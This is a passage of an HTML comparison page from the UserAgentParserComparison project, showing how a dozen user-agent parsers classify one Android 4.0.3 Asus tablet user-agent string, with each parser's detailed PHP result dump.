Android Browser 4.0 [comment] => Android Browser 4.0 [browser] => Android [browser_type] => Browser [browser_bits] => 32 [browser_maker] => Google Inc [browser_modus] => unknown [version] => 4.0 [majorver] => 4 [minorver] => 0 [platform] => Android [platform_version] => 4.0 [platform_description] => Android OS [platform_bits] => 32 [platform_maker] => Google Inc [alpha] => [beta] => [win16] => [win32] => [win64] => [frames] => 1 [iframes] => 1 [tables] => 1 [cookies] => 1 [backgroundsounds] => [javascript] => 1 [vbscript] => [javaapplets] => 1 [activexcontrols] => [ismobiledevice] => 1 [istablet] => [issyndicationreader] => [crawler] => [cssversion] => 3 [aolversion] => 0 [device_name] => general Mobile Phone [device_maker] => unknown [device_type] => Mobile Phone [device_pointing_method] => touchscreen [device_code_name] => general Mobile Phone [device_brand_name] => unknown [renderingengine_name] => WebKit [renderingengine_version] => unknown [renderingengine_description] => For Google Chrome, iOS (including both mobile Safari, WebViews within third-party apps, and web clips), Safari, Arora, Midori, OmniWeb, Shiira, iCab since version 4, Web, SRWare Iron, Rekonq, and in Maxthon 3. [renderingengine_maker] => Apple Inc ) </code></pre></p> </div> <div class="modal-footer"> <a href="#!" class="modal-action modal-close waves-effect waves-green btn-flat ">close</a> </div> </div> </td></tr><tr><td>DonatjUAParser<br /><small>v0.5.0</small></td><td>Android Browser 4.0</td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td style="border-left: 1px solid #555"><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td style="border-left: 1px solid #555"><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td>0.001</td><td> <!-- Modal Trigger --> <a class="modal-trigger btn waves-effect waves-light" href="#modal-f1436016-fdf1-4aea-b4be-1d7c99ab0661">Detail</a> <!-- Modal Structure --> <div id="modal-f1436016-fdf1-4aea-b4be-1d7c99ab0661" class="modal modal-fixed-footer"> <div class="modal-content"> <h4>DonatjUAParser result detail</h4> <p><pre><code class="php">Array ( [platform] => Android [browser] => Android Browser [version] => 4.0 ) </code></pre></p> </div> <div class="modal-footer"> <a href="#!" class="modal-action modal-close waves-effect waves-green btn-flat ">close</a> </div> </div> </td></tr><tr><td>NeutrinoApiCom<br /><small></small></td><td>Android Webkit 4.0</td><td><i class="material-icons">close</i></td><td>Android 4.0.3</td><td style="border-left: 1px solid #555">Generic</td><td>Android 4.0</td><td>mobile-browser</td><td>yes</td><td><i class="material-icons">close</i></td><td style="border-left: 1px solid #555"></td><td></td><td><i class="material-icons">close</i></td><td>0.247</td><td> <!-- Modal Trigger --> <a class="modal-trigger btn waves-effect waves-light" href="#modal-9b0fa449-ec1b-40c8-8b1c-9486eb3b9cbc">Detail</a> <!-- Modal Structure --> <div id="modal-9b0fa449-ec1b-40c8-8b1c-9486eb3b9cbc" class="modal modal-fixed-footer"> <div class="modal-content"> <h4>NeutrinoApiCom result detail</h4> <p><pre><code class="php">stdClass Object ( [mobile_screen_height] => 480 [is_mobile] => 1 [type] => mobile-browser [mobile_brand] => Generic [mobile_model] => Android 4.0 [version] => 4.0 [is_android] => 1 [browser_name] => Android Webkit [operating_system_family] => Android [operating_system_version] => 4.0.3 [is_ios] => [producer] => Google Inc. [operating_system] => Android 4.0.x Ice Cream Sandwich [mobile_screen_width] => 320 [mobile_browser] => Android Webkit ) </code></pre></p> </div> <div class="modal-footer"> <a href="#!" class="modal-action modal-close waves-effect waves-green btn-flat ">close</a> </div> </div> </td></tr><tr><td>PiwikDeviceDetector<br /><small>3.5.2</small></td><td>Android Browser </td><td>WebKit </td><td>Android 4.0</td><td style="border-left: 1px solid #555">Asus</td><td>Eee Pad MeMO 171</td><td>tablet</td><td>yes</td><td></td><td style="border-left: 1px solid #555"></td><td></td><td></td><td>0.004</td><td> <!-- Modal Trigger --> <a class="modal-trigger btn waves-effect waves-light" href="#modal-21638055-738d-46ba-a1b1-f5114bc26475">Detail</a> <!-- Modal Structure --> <div id="modal-21638055-738d-46ba-a1b1-f5114bc26475" class="modal modal-fixed-footer"> <div class="modal-content"> <h4>PiwikDeviceDetector result detail</h4> <p><pre><code class="php">Array ( [client] => Array ( [type] => browser [name] => Android Browser [short_name] => AN [version] => [engine] => WebKit ) [operatingSystem] => Array ( [name] => Android [short_name] => AND [version] => 4.0 [platform] => ) [device] => Array ( [brand] => AU [brandName] => Asus [model] => Eee Pad MeMO 171 [device] => 2 [deviceName] => tablet ) [bot] => [extra] => Array ( [isBot] => [isBrowser] => 1 [isFeedReader] => [isMobileApp] => [isPIM] => [isLibrary] => [isMediaPlayer] => [isCamera] => [isCarBrowser] => [isConsole] => [isFeaturePhone] => [isPhablet] => [isPortableMediaPlayer] => [isSmartDisplay] => [isSmartphone] => [isTablet] => 1 [isTV] => [isDesktop] => [isMobile] => 1 [isTouchEnabled] => ) ) </code></pre></p> </div> <div class="modal-footer"> <a href="#!" class="modal-action modal-close waves-effect waves-green btn-flat ">close</a> </div> </div> </td></tr><tr><td>SinergiBrowserDetector<br /><small>6.0.0</small></td><td>Navigator 4.0</td><td><i class="material-icons">close</i></td><td>Android 4.0.3</td><td style="border-left: 1px solid #555"><i class="material-icons">close</i></td><td></td><td><i class="material-icons">close</i></td><td>yes</td><td><i class="material-icons">close</i></td><td style="border-left: 1px solid #555"></td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td>0.001</td><td> <!-- Modal Trigger --> <a class="modal-trigger btn waves-effect waves-light" href="#modal-5415e7f2-ef7b-434c-abe0-b71ba9f6707c">Detail</a> <!-- Modal Structure --> <div id="modal-5415e7f2-ef7b-434c-abe0-b71ba9f6707c" class="modal modal-fixed-footer"> <div class="modal-content"> <h4>SinergiBrowserDetector result detail</h4> <p><pre><code class="php">Array ( [browser] => Sinergi\BrowserDetector\Browser Object ( [userAgent:Sinergi\BrowserDetector\Browser:private] => Sinergi\BrowserDetector\UserAgent Object ( [userAgentString:Sinergi\BrowserDetector\UserAgent:private] => Mozilla/5.0 (Linux; U; Android 4.0.3; zh-tw; ME171 Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30 ) [name:Sinergi\BrowserDetector\Browser:private] => Navigator [version:Sinergi\BrowserDetector\Browser:private] => 4.0 [isRobot:Sinergi\BrowserDetector\Browser:private] => [isChromeFrame:Sinergi\BrowserDetector\Browser:private] => ) [operatingSystem] => Sinergi\BrowserDetector\Os Object ( [name:Sinergi\BrowserDetector\Os:private] => Android [version:Sinergi\BrowserDetector\Os:private] => 4.0.3 [isMobile:Sinergi\BrowserDetector\Os:private] => 1 [userAgent:Sinergi\BrowserDetector\Os:private] => Sinergi\BrowserDetector\UserAgent Object ( [userAgentString:Sinergi\BrowserDetector\UserAgent:private] => Mozilla/5.0 (Linux; U; Android 4.0.3; zh-tw; ME171 Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30 ) ) [device] => Sinergi\BrowserDetector\Device Object ( [name:Sinergi\BrowserDetector\Device:private] => unknown [userAgent:Sinergi\BrowserDetector\Device:private] => Sinergi\BrowserDetector\UserAgent Object ( [userAgentString:Sinergi\BrowserDetector\UserAgent:private] => Mozilla/5.0 (Linux; U; Android 4.0.3; zh-tw; ME171 Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30 ) ) ) </code></pre></p> </div> <div class="modal-footer"> <a href="#!" class="modal-action modal-close waves-effect waves-green btn-flat ">close</a> </div> </div> </td></tr><tr><td>UAParser<br /><small>v3.4.5</small></td><td>Android 4.0.3</td><td><i class="material-icons">close</i></td><td>Android 4.0.3</td><td style="border-left: 1px solid #555">Asus</td><td>ME171</td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td style="border-left: 1px solid #555"></td><td></td><td><i class="material-icons">close</i></td><td>0.001</td><td> <!-- Modal Trigger --> <a class="modal-trigger btn waves-effect waves-light" href="#modal-346c1a98-5fd3-454f-b6c8-350f2f505d8b">Detail</a> <!-- Modal Structure --> <div id="modal-346c1a98-5fd3-454f-b6c8-350f2f505d8b" class="modal modal-fixed-footer"> <div class="modal-content"> <h4>UAParser result detail</h4> <p><pre><code class="php">UAParser\Result\Client Object ( [ua] => UAParser\Result\UserAgent Object ( [major] => 4 [minor] => 0 [patch] => 3 [family] => Android ) [os] => UAParser\Result\OperatingSystem Object ( [major] => 4 [minor] => 0 [patch] => 3 [patchMinor] => [family] => Android ) [device] => UAParser\Result\Device Object ( [brand] => Asus [model] => ME171 [family] => Asus ME171 ) [originalUserAgent] => Mozilla/5.0 (Linux; U; Android 4.0.3; zh-tw; ME171 Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30 ) </code></pre></p> </div> <div class="modal-footer"> <a href="#!" class="modal-action modal-close waves-effect waves-green btn-flat ">close</a> </div> </div> </td></tr><tr><td>UserAgentStringCom<br /><small></small></td><td>Android Webkit Browser </td><td><i class="material-icons">close</i></td><td>Android 4.0.3</td><td style="border-left: 1px solid #555"><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td style="border-left: 1px solid #555"></td><td></td><td></td><td>0.047</td><td> <!-- Modal Trigger --> <a class="modal-trigger btn waves-effect waves-light" href="#modal-9cdd8b45-a2eb-406b-bd27-7e48af38ffd4">Detail</a> <!-- Modal Structure --> <div id="modal-9cdd8b45-a2eb-406b-bd27-7e48af38ffd4" class="modal modal-fixed-footer"> <div class="modal-content"> <h4>UserAgentStringCom result detail</h4> <p><pre><code class="php">stdClass Object ( [agent_type] => Browser [agent_name] => Android Webkit Browser [agent_version] => -- [os_type] => Android [os_name] => Android [os_versionName] => [os_versionNumber] => 4.0.3 [os_producer] => [os_producerURL] => [linux_distibution] => Null [agent_language] => Chinese - Taiwan [agent_languageTag] => zh-tw ) </code></pre></p> </div> <div class="modal-footer"> <a href="#!" class="modal-action modal-close waves-effect waves-green btn-flat ">close</a> </div> </div> </td></tr><tr><td>WhatIsMyBrowserCom<br /><small></small></td><td>Android Browser 4.0</td><td>WebKit 534.30</td><td>Android 4.0.3</td><td style="border-left: 1px solid #555"></td><td></td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td style="border-left: 1px solid #555"><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td>0.421</td><td> <!-- Modal Trigger --> <a class="modal-trigger btn waves-effect waves-light" href="#modal-9795f66f-7271-430e-973a-a5c0e14dc35a">Detail</a> <!-- Modal Structure --> <div id="modal-9795f66f-7271-430e-973a-a5c0e14dc35a" class="modal modal-fixed-footer"> <div class="modal-content"> <h4>WhatIsMyBrowserCom result detail</h4> <p><pre><code class="php">stdClass Object ( [operating_system_name] => Android [simple_sub_description_string] => [simple_browser_string] => Android Browser 4 on Android (Ice Cream Sandwich) [browser_version] => 4 [extra_info] => Array ( ) [operating_platform] => [extra_info_table] => stdClass Object ( [System Build] => IML74K ) [layout_engine_name] => WebKit [detected_addons] => Array ( ) [operating_system_flavour_code] => [hardware_architecture] => [operating_system_flavour] => [operating_system_frameworks] => Array ( ) [browser_name_code] => android-browser [operating_system_version] => Ice Cream Sandwich [simple_operating_platform_string] => [is_abusive] => [layout_engine_version] => 534.30 [browser_capabilities] => Array ( ) [operating_platform_vendor_name] => [operating_system] => Android (Ice Cream Sandwich) [operating_system_version_full] => 4.0.3 [operating_platform_code] => [browser_name] => Android Browser [operating_system_name_code] => android [user_agent] => Mozilla/5.0 (Linux; U; Android 4.0.3; zh-tw; ME171 Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30 [browser_version_full] => 4.0 [browser] => Android Browser 4 ) </code></pre></p> </div> <div class="modal-footer"> <a href="#!" class="modal-action modal-close waves-effect waves-green btn-flat ">close</a> </div> </div> </td></tr><tr><td>WhichBrowser<br /><small>2.0.10</small></td><td>Android Browser </td><td>Webkit 534.30</td><td>Android 4.0.3</td><td style="border-left: 1px solid #555">Asus</td><td>Eee Pad MeMO</td><td>tablet</td><td>yes</td><td><i class="material-icons">close</i></td><td style="border-left: 1px solid #555"></td><td></td><td><i class="material-icons">close</i></td><td>0.008</td><td> <!-- Modal Trigger --> <a class="modal-trigger btn waves-effect waves-light" href="#modal-342c8d32-4765-40a8-8a5c-af3a38d19ae4">Detail</a> <!-- Modal Structure --> <div id="modal-342c8d32-4765-40a8-8a5c-af3a38d19ae4" class="modal modal-fixed-footer"> <div class="modal-content"> <h4>WhichBrowser result detail</h4> <p><pre><code class="php">Array ( [browser] => Array ( [name] => Android Browser ) [engine] => Array ( [name] => Webkit [version] => 534.30 ) [os] => Array ( [name] => Android [version] => 4.0.3 ) [device] => Array ( [type] => tablet [manufacturer] => Asus [model] => Eee Pad MeMO ) ) </code></pre></p> </div> <div class="modal-footer"> <a href="#!" class="modal-action modal-close waves-effect waves-green btn-flat ">close</a> </div> </div> </td></tr><tr><td>Woothee<br /><small>v1.2.0</small></td><td>Safari 4.0</td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td style="border-left: 1px solid #555"><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td>smartphone</td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td style="border-left: 1px solid #555"></td><td></td><td><i class="material-icons">close</i></td><td>0</td><td> <!-- Modal Trigger --> <a class="modal-trigger btn waves-effect waves-light" href="#modal-3f285ff5-314b-4db4-9948-54572e92e7b6">Detail</a> <!-- Modal Structure --> <div id="modal-3f285ff5-314b-4db4-9948-54572e92e7b6" class="modal modal-fixed-footer"> <div class="modal-content"> <h4>Woothee result detail</h4> <p><pre><code class="php">Array ( [name] => Safari [vendor] => Apple [version] => 4.0 [category] => smartphone [os] => Android [os_version] => 4.0.3 ) </code></pre></p> </div> <div class="modal-footer"> <a href="#!" class="modal-action modal-close waves-effect waves-green btn-flat ">close</a> </div> </div> </td></tr><tr><td>Wurfl<br /><small>1.6.4</small></td><td>Android Webkit 4.0</td><td><i class="material-icons">close</i></td><td>Android 4.0</td><td style="border-left: 1px solid #555"></td><td></td><td>Tablet</td><td>yes</td><td>yes</td><td style="border-left: 1px solid #555"></td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td>0.13004</td><td> <!-- Modal Trigger --> <a class="modal-trigger btn waves-effect waves-light" href="#modal-1a1aee36-7ce7-4111-a391-8e2c501f1532">Detail</a> <!-- Modal Structure --> <div id="modal-1a1aee36-7ce7-4111-a391-8e2c501f1532" class="modal modal-fixed-footer"> <div class="modal-content"> <h4>Wurfl result detail</h4> <p><pre><code class="php">Array ( [virtual] => Array ( [is_android] => true [is_ios] => false [is_windows_phone] => false [is_app] => false [is_full_desktop] => false [is_largescreen] => true [is_mobile] => true [is_robot] => false [is_smartphone] => false [is_touchscreen] => true [is_wml_preferred] => false [is_xhtmlmp_preferred] => false [is_html_preferred] => true [advertised_device_os] => Android [advertised_device_os_version] => 4.0 [advertised_browser] => Android Webkit [advertised_browser_version] => 4.0 [complete_device_name] => Generic Android 4 Tablet [form_factor] => Tablet [is_phone] => false [is_app_webview] => false ) [all] => Array ( [brand_name] => Generic [model_name] => Android 4 Tablet [unique] => true [ununiqueness_handler] => [is_wireless_device] => true [device_claims_web_support] => true [has_qwerty_keyboard] => true [can_skip_aligned_link_row] => true [uaprof] => [uaprof2] => [uaprof3] => [nokia_series] => 0 [nokia_edition] => 0 [device_os] => Android [mobile_browser] => Android Webkit [mobile_browser_version] => [device_os_version] => 4.0 [pointing_method] => touchscreen [release_date] => 2012_january [marketing_name] => [model_extra_info] => [nokia_feature_pack] => 0 [can_assign_phone_number] => false [is_tablet] => true [manufacturer_name] => [is_bot] => false [is_google_glass] => false [proportional_font] => false [built_in_back_button_support] => false [card_title_support] => true [softkey_support] => false [table_support] => true [numbered_menus] => false [menu_with_select_element_recommended] => false [menu_with_list_of_links_recommended] => true [icons_on_menu_items_support] => false [break_list_of_links_with_br_element_recommended] => true [access_key_support] => false [wrap_mode_support] => false [times_square_mode_support] => false [deck_prefetch_support] => false [elective_forms_recommended] => true [wizards_recommended] => false [image_as_link_support] => false [insert_br_element_after_widget_recommended] => false [wml_can_display_images_and_text_on_same_line] => false [wml_displays_image_in_center] => false [opwv_wml_extensions_support] => false [wml_make_phone_call_string] => wtai://wp/mc; [chtml_display_accesskey] => false [emoji] => false [chtml_can_display_images_and_text_on_same_line] => false [chtml_displays_image_in_center] => false [imode_region] => none [chtml_make_phone_call_string] => tel: [chtml_table_support] => false [xhtml_honors_bgcolor] => true [xhtml_supports_forms_in_table] => true [xhtml_support_wml2_namespace] => false [xhtml_autoexpand_select] => false [xhtml_select_as_dropdown] => false [xhtml_select_as_radiobutton] => false [xhtml_select_as_popup] => false [xhtml_display_accesskey] => false [xhtml_supports_invisible_text] => false [xhtml_supports_inline_input] => false [xhtml_supports_monospace_font] => false [xhtml_supports_table_for_layout] => true [xhtml_supports_css_cell_table_coloring] => true [xhtml_format_as_css_property] => false [xhtml_format_as_attribute] => false [xhtml_nowrap_mode] => false [xhtml_marquee_as_css_property] => false [xhtml_readable_background_color1] => #FFFFFF [xhtml_readable_background_color2] => #FFFFFF [xhtml_allows_disabled_form_elements] => true [xhtml_document_title_support] => true [xhtml_preferred_charset] => iso-8859-1 [opwv_xhtml_extensions_support] => false [xhtml_make_phone_call_string] => tel: [xhtmlmp_preferred_mime_type] => text/html [xhtml_table_support] => true [xhtml_send_sms_string] => sms: [xhtml_send_mms_string] => mms: [xhtml_file_upload] => supported [cookie_support] => true [accept_third_party_cookie] => true [xhtml_supports_iframe] => full [xhtml_avoid_accesskeys] => true [xhtml_can_embed_video] => none [ajax_support_javascript] => true [ajax_manipulate_css] => true [ajax_support_getelementbyid] => true [ajax_support_inner_html] => true [ajax_xhr_type] => standard [ajax_manipulate_dom] => true [ajax_support_events] => true [ajax_support_event_listener] => true [ajax_preferred_geoloc_api] => w3c_api [xhtml_support_level] => 4 [preferred_markup] => html_web_4_0 [wml_1_1] => false [wml_1_2] => false [wml_1_3] => false [html_wi_w3_xhtmlbasic] => true [html_wi_oma_xhtmlmp_1_0] => true [html_wi_imode_html_1] => false [html_wi_imode_html_2] => false [html_wi_imode_html_3] => false [html_wi_imode_html_4] => false [html_wi_imode_html_5] => false [html_wi_imode_htmlx_1] => false [html_wi_imode_htmlx_1_1] => false [html_wi_imode_compact_generic] => false [html_web_3_2] => true [html_web_4_0] => true [voicexml] => false [multipart_support] => false [total_cache_disable_support] => false [time_to_live_support] => false [resolution_width] => 480 [resolution_height] => 800 [columns] => 60 [max_image_width] => 480 [max_image_height] => 800 [rows] => 40 [physical_screen_width] => 92 [physical_screen_height] => 153 [dual_orientation] => true [density_class] => 1.0 [wbmp] => true [bmp] => false [epoc_bmp] => false [gif_animated] => false [jpg] => true [png] => true [tiff] => false [transparent_png_alpha] => true [transparent_png_index] => true [svgt_1_1] => true [svgt_1_1_plus] => false [greyscale] => false [gif] => true [colors] => 65536 [webp_lossy_support] => true [webp_lossless_support] => false [post_method_support] => true [basic_authentication_support] => true [empty_option_value_support] => true [emptyok] => false [nokia_voice_call] => false [wta_voice_call] => false [wta_phonebook] => false [wta_misc] => false [wta_pdc] => false [https_support] => true [phone_id_provided] => false [max_data_rate] => 3600 [wifi] => true [sdio] => false [vpn] => false [has_cellular_radio] => true [max_deck_size] => 2000000 [max_url_length_in_requests] => 256 [max_url_length_homepage] => 0 [max_url_length_bookmark] => 0 [max_url_length_cached_page] => 0 [max_no_of_connection_settings] => 0 [max_no_of_bookmarks] => 0 [max_length_of_username] => 0 [max_length_of_password] => 0 [max_object_size] => 0 [downloadfun_support] => false [directdownload_support] => true [inline_support] => false [oma_support] => true [ringtone] => false [ringtone_3gpp] => false [ringtone_midi_monophonic] => false [ringtone_midi_polyphonic] => false [ringtone_imelody] => false [ringtone_digiplug] => false [ringtone_compactmidi] => false [ringtone_mmf] => false [ringtone_rmf] => false [ringtone_xmf] => false [ringtone_amr] => false [ringtone_awb] => false [ringtone_aac] => false [ringtone_wav] => false [ringtone_mp3] => false [ringtone_spmidi] => false [ringtone_qcelp] => false [ringtone_voices] => 1 [ringtone_df_size_limit] => 0 [ringtone_directdownload_size_limit] => 0 [ringtone_inline_size_limit] => 0 [ringtone_oma_size_limit] => 0 [wallpaper] => false [wallpaper_max_width] => 0 [wallpaper_max_height] => 0 [wallpaper_preferred_width] => 0 [wallpaper_preferred_height] => 0 [wallpaper_resize] => none [wallpaper_wbmp] => false [wallpaper_bmp] => false [wallpaper_gif] => false [wallpaper_jpg] => false [wallpaper_png] => false [wallpaper_tiff] => false [wallpaper_greyscale] => false [wallpaper_colors] => 2 [wallpaper_df_size_limit] => 0 [wallpaper_directdownload_size_limit] => 0 [wallpaper_inline_size_limit] => 0 [wallpaper_oma_size_limit] => 0 [screensaver] => false [screensaver_max_width] => 0 [screensaver_max_height] => 0 [screensaver_preferred_width] => 0 [screensaver_preferred_height] => 0 [screensaver_resize] => none [screensaver_wbmp] => false [screensaver_bmp] => false [screensaver_gif] => false [screensaver_jpg] => false [screensaver_png] => false [screensaver_greyscale] => false [screensaver_colors] => 2 [screensaver_df_size_limit] => 0 [screensaver_directdownload_size_limit] => 0 [screensaver_inline_size_limit] => 0 [screensaver_oma_size_limit] => 0 [picture] => false [picture_max_width] => 0 [picture_max_height] => 0 [picture_preferred_width] => 0 [picture_preferred_height] => 0 [picture_resize] => none [picture_wbmp] => false [picture_bmp] => false [picture_gif] => false [picture_jpg] => false [picture_png] => false [picture_greyscale] => false [picture_colors] => 2 [picture_df_size_limit] => 0 [picture_directdownload_size_limit] => 0 [picture_inline_size_limit] => 0 [picture_oma_size_limit] => 0 [video] => false [oma_v_1_0_forwardlock] => false [oma_v_1_0_combined_delivery] => false [oma_v_1_0_separate_delivery] => false [streaming_video] => true [streaming_3gpp] => true [streaming_mp4] => true [streaming_mov] => false [streaming_video_size_limit] => 0 [streaming_real_media] => none [streaming_flv] => false [streaming_3g2] => false [streaming_vcodec_h263_0] => 10 [streaming_vcodec_h263_3] => -1 [streaming_vcodec_mpeg4_sp] => 2 [streaming_vcodec_mpeg4_asp] => -1 [streaming_vcodec_h264_bp] => 3.0 [streaming_acodec_amr] => nb [streaming_acodec_aac] => lc [streaming_wmv] => none [streaming_preferred_protocol] => rtsp [streaming_preferred_http_protocol] => apple_live_streaming [wap_push_support] => false [connectionless_service_indication] => false [connectionless_service_load] => false [connectionless_cache_operation] => false [connectionoriented_unconfirmed_service_indication] => false [connectionoriented_unconfirmed_service_load] => false [connectionoriented_unconfirmed_cache_operation] => false [connectionoriented_confirmed_service_indication] => false [connectionoriented_confirmed_service_load] => false [connectionoriented_confirmed_cache_operation] => false [utf8_support] => true [ascii_support] => false [iso8859_support] => false [expiration_date] => false [j2me_cldc_1_0] => false [j2me_cldc_1_1] => false [j2me_midp_1_0] => false [j2me_midp_2_0] => false [doja_1_0] => false [doja_1_5] => false [doja_2_0] => false [doja_2_1] => false [doja_2_2] => false [doja_3_0] => false [doja_3_5] => false [doja_4_0] => false [j2me_jtwi] => false [j2me_mmapi_1_0] => false [j2me_mmapi_1_1] => false [j2me_wmapi_1_0] => false [j2me_wmapi_1_1] => false [j2me_wmapi_2_0] => false [j2me_btapi] => false [j2me_3dapi] => false [j2me_locapi] => false [j2me_nokia_ui] => false [j2me_motorola_lwt] => false [j2me_siemens_color_game] => false [j2me_siemens_extension] => false [j2me_heap_size] => 0 [j2me_max_jar_size] => 0 [j2me_storage_size] => 0 [j2me_max_record_store_size] => 0 [j2me_screen_width] => 0 [j2me_screen_height] => 0 [j2me_canvas_width] => 0 [j2me_canvas_height] => 0 [j2me_bits_per_pixel] => 0 [j2me_audio_capture_enabled] => false [j2me_video_capture_enabled] => false [j2me_photo_capture_enabled] => false [j2me_capture_image_formats] => none [j2me_http] => false [j2me_https] => false [j2me_socket] => false [j2me_udp] => false [j2me_serial] => false [j2me_gif] => false [j2me_gif89a] => false [j2me_jpg] => false [j2me_png] => false [j2me_bmp] => false [j2me_bmp3] => false [j2me_wbmp] => false [j2me_midi] => false [j2me_wav] => false [j2me_amr] => false [j2me_mp3] => false [j2me_mp4] => false [j2me_imelody] => false [j2me_rmf] => false [j2me_au] => false [j2me_aac] => false [j2me_realaudio] => false [j2me_xmf] => false [j2me_wma] => false [j2me_3gpp] => false [j2me_h263] => false [j2me_svgt] => false [j2me_mpeg4] => false [j2me_realvideo] => false [j2me_real8] => false [j2me_realmedia] => false [j2me_left_softkey_code] => 0 [j2me_right_softkey_code] => 0 [j2me_middle_softkey_code] => 0 [j2me_select_key_code] => 0 [j2me_return_key_code] => 0 [j2me_clear_key_code] => 0 [j2me_datefield_no_accepts_null_date] => false [j2me_datefield_broken] => false [receiver] => false [sender] => false [mms_max_size] => 0 [mms_max_height] => 0 [mms_max_width] => 0 [built_in_recorder] => false [built_in_camera] => true [mms_jpeg_baseline] => false [mms_jpeg_progressive] => false [mms_gif_static] => false [mms_gif_animated] => false [mms_png] => false [mms_bmp] => false [mms_wbmp] => false [mms_amr] => false [mms_wav] => false [mms_midi_monophonic] => false [mms_midi_polyphonic] => false [mms_midi_polyphonic_voices] => 0 [mms_spmidi] => false [mms_mmf] => false [mms_mp3] => false [mms_evrc] => false [mms_qcelp] => false [mms_ota_bitmap] => false [mms_nokia_wallpaper] => false [mms_nokia_operatorlogo] => false [mms_nokia_3dscreensaver] => false [mms_nokia_ringingtone] => false [mms_rmf] => false [mms_xmf] => false [mms_symbian_install] => false [mms_jar] => false [mms_jad] => false [mms_vcard] => false [mms_vcalendar] => false [mms_wml] => false [mms_wbxml] => false [mms_wmlc] => false [mms_video] => false [mms_mp4] => false [mms_3gpp] => false [mms_3gpp2] => false [mms_max_frame_rate] => 0 [nokiaring] => false [picturemessage] => false [operatorlogo] => false [largeoperatorlogo] => false [callericon] => false [nokiavcard] => false [nokiavcal] => false [sckl_ringtone] => false [sckl_operatorlogo] => false [sckl_groupgraphic] => false [sckl_vcard] => false [sckl_vcalendar] => false [text_imelody] => false [ems] => false [ems_variablesizedpictures] => false [ems_imelody] => false [ems_odi] => false [ems_upi] => false [ems_version] => 0 [siemens_ota] => false [siemens_logo_width] => 101 [siemens_logo_height] => 29 [siemens_screensaver_width] => 101 [siemens_screensaver_height] => 50 [gprtf] => false [sagem_v1] => false [sagem_v2] => false [panasonic] => false [sms_enabled] => true [wav] => false [mmf] => false [smf] => false [mld] => false [midi_monophonic] => false [midi_polyphonic] => false [sp_midi] => false [rmf] => false [xmf] => false [compactmidi] => false [digiplug] => false [nokia_ringtone] => false [imelody] => false [au] => false [amr] => false [awb] => false [aac] => true [mp3] => true [voices] => 1 [qcelp] => false [evrc] => false [flash_lite_version] => [fl_wallpaper] => false [fl_screensaver] => false [fl_standalone] => false [fl_browser] => false [fl_sub_lcd] => false [full_flash_support] => true [css_supports_width_as_percentage] => true [css_border_image] => webkit [css_rounded_corners] => webkit [css_gradient] => none [css_spriting] => true [css_gradient_linear] => none [is_transcoder] => false [transcoder_ua_header] => user-agent [rss_support] => false [pdf_support] => true [progressive_download] => true [playback_vcodec_h263_0] => 10 [playback_vcodec_h263_3] => -1 [playback_vcodec_mpeg4_sp] => 0 [playback_vcodec_mpeg4_asp] => -1 [playback_vcodec_h264_bp] => 3.0 [playback_real_media] => none [playback_3gpp] => true [playback_3g2] => false [playback_mp4] => true [playback_mov] => false [playback_acodec_amr] => nb [playback_acodec_aac] => none [playback_df_size_limit] => 0 [playback_directdownload_size_limit] => 0 [playback_inline_size_limit] => 0 [playback_oma_size_limit] => 0 [playback_acodec_qcelp] => false [playback_wmv] => none [hinted_progressive_download] => true [html_preferred_dtd] => html4 [viewport_supported] => true [viewport_width] => device_width_token [viewport_userscalable] => no [viewport_initial_scale] => [viewport_maximum_scale] => [viewport_minimum_scale] => [mobileoptimized] => false [handheldfriendly] => false [canvas_support] => full [image_inlining] => true [is_smarttv] => false [is_console] => false [nfc_support] => false [ux_full_desktop] => false [jqm_grade] => A [is_sencha_touch_ok] => false [controlcap_is_smartphone] => default [controlcap_is_ios] => default [controlcap_is_android] => default [controlcap_is_robot] => default [controlcap_is_app] => default [controlcap_advertised_device_os] => default [controlcap_advertised_device_os_version] => default [controlcap_advertised_browser] => default [controlcap_advertised_browser_version] => default [controlcap_is_windows_phone] => default [controlcap_is_full_desktop] => default [controlcap_is_largescreen] => default [controlcap_is_mobile] => default [controlcap_is_touchscreen] => default [controlcap_is_wml_preferred] => default [controlcap_is_xhtmlmp_preferred] => default [controlcap_is_html_preferred] => default [controlcap_form_factor] => default [controlcap_complete_device_name] => default ) ) </code></pre></p> </div> <div class="modal-footer"> <a href="#!" class="modal-action modal-close waves-effect waves-green btn-flat ">close</a> </div> </div> </td></tr></table> </div> <div class="section"> <h1 class="header center orange-text">About this comparison</h1> <div class="row center"> <h5 class="header light"> The primary goal of this project is simple<br /> I wanted to know which user agent parser is the most accurate in each part - device detection, bot detection and so on...<br /> <br /> The secondary goal is to provide a source for all user agent parsers to improve their detection based on this results.<br /> <br /> You can also improve this further, by suggesting ideas at <a href="https://github.com/ThaDafinser/UserAgentParserComparison">ThaDafinser/UserAgentParserComparison</a><br /> <br /> The comparison is based on the abstraction by <a href="https://github.com/ThaDafinser/UserAgentParser">ThaDafinser/UserAgentParser</a> </h5> </div> </div> <div class="card"> <div class="card-content"> Comparison created <i>2016-02-13 13:41:35</i> | by <a href="https://github.com/ThaDafinser">ThaDafinser</a> </div> </div> </div> <script src="https://code.jquery.com/jquery-2.1.4.min.js"></script> 